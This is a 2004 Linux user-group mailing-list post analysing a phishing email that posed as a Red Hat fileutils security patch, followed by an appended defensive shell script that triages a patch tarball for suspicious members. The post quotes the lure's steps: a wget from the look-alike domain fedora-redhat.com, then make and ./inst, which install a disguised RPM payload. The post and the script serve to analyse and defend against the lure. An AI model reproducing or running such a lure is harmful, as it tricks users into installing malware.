[NTLUG:Discuss] Re: First Linux patch spoof (or someone in NT screwing with me personally ;-)? -- interesting malware
Bryan J. Smith
b.j.smith at ieee.org
Sun Oct 24 17:34:19 CDT 2004
On Sun, 2004-10-24 at 18:10, Bryan J. Smith wrote:
> E-mail originated from the U of Texas at Arlington (hmmm, close by
> to you'all ... this sounds like it might have been a personal e-mail).
I also realized that Dallas is a big Microsoft center (among other
companies).
Maybe someone on NTLUG who works for them (or another) is testing select
Linux people?
Quoted from MALWARE e-mail:
> * First download the patch from the Security RedHat mirror: wget
> www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
> * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
> * cd fileutils-1.0.6.patch
> * make
> * ./inst
Interesting malware.
Convoluted POS, but I guess the "make" is what a person green to
installing Linux software might just do if they didn't know what it
actually does.
The make builds a C code installer (looks like a lot of fluff/useless
hex bytes at the top to keep me from reading the rest of the file ;-)
that then installs an RPM v3 file (contained in the .tar.gz). I assume
it does some sort of dancing where it puts the package/version info into
the RPM database, but maybe modifies it (or uses a rootkit) so a verify
or other checks will work as expected (possibly against the real Red
Hat/Fedora package version?). I'd find out exactly in a VM, but I've
got more important things to do right now.
More interesting is that they want you to run "./inst". If they were
interested in better "social engineering," I would have created an
"install" target in the Makefile that did this. Again, a person green
in installing Linux software would probably be looking for "make
install" instead.
Oh well, fun stuff on a Sunday to distract me from the fact that my
Fantasy Football team just tanked. ;-ppp
--
Bryan J. Smith b.j.smith at ieee.org
------------------------------------------------------------------
"Communities don't have rights. Only individuals in the community
have rights. ... That idea of community rights is firmly rooted
in the 'Communist Manifesto.'" -- Michael Badnarik
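Added defender-side example, not from the post or from NTLUG: a small POSIX shell triage that lists a downloaded "patch" tarball without extracting or building it, and flags members a genuine source patch would never carry (a Makefile, so that `make` runs arbitrary commands; an installer binary; an embedded RPM). The sample archive it builds is constructed to mirror the lure quoted above, with dummy contents only; the function and file names are assumptions.

```shell
#!/bin/sh
# Assumed helper names; nothing here is the real malware.

# List the archive without extracting it and print one line per member
# that should not be in a source patch. GNU and BSD tar autodetect gzip
# on read, so a .tar.gz works with plain -tf.
triage_patch_archive() {
    tar -tf "$1" | while IFS= read -r entry; do
        case "${entry##*/}" in
            Makefile|makefile|GNUmakefile|configure)
                echo "FLAG build script (make runs arbitrary commands): $entry" ;;
            *.rpm)
                echo "FLAG package payload inside a 'patch': $entry" ;;
            inst|install|install.sh|setup|*.bin)
                echo "FLAG installer/binary: $entry" ;;
            *.patch|*.diff|"")
                ;;   # diff text or a directory entry: expected in a real patch
            *)
                echo "note: unexpected member: $entry" ;;
        esac
    done
}

# Number of FLAG lines; 0 means the archive looks like a plain source patch.
flag_count() {
    triage_patch_archive "$1" | grep -c '^FLAG' || true
}

# Constructed sample mirroring the quoted lure: a "patch" directory holding
# a Makefile that builds an installer and an embedded RPM (dummy bytes).
make_sample_lure() {
    dir=$(mktemp -d)
    mkdir -p "$dir/fileutils-1.0.6.patch"
    printf 'all:\n\tcc -o inst inst.c\n' > "$dir/fileutils-1.0.6.patch/Makefile"
    printf 'int main(void){return 0;}\n' > "$dir/fileutils-1.0.6.patch/inst.c"
    printf 'dummy rpm bytes\n' > "$dir/fileutils-1.0.6.patch/fileutils-1.0.6.rpm"
    tar -czf "$dir/fileutils-1.0.6.patch.tar.gz" -C "$dir" fileutils-1.0.6.patch
    echo "$dir/fileutils-1.0.6.patch.tar.gz"
}

sample=$(make_sample_lure)
triage_patch_archive "$sample"
echo "flags: $(flag_count "$sample")"
```

Run it on any archive before typing `make`; a real patch from a vendor mirror lists only diff text, and anything else is a reason to verify the download against the vendor's signature rather than build it.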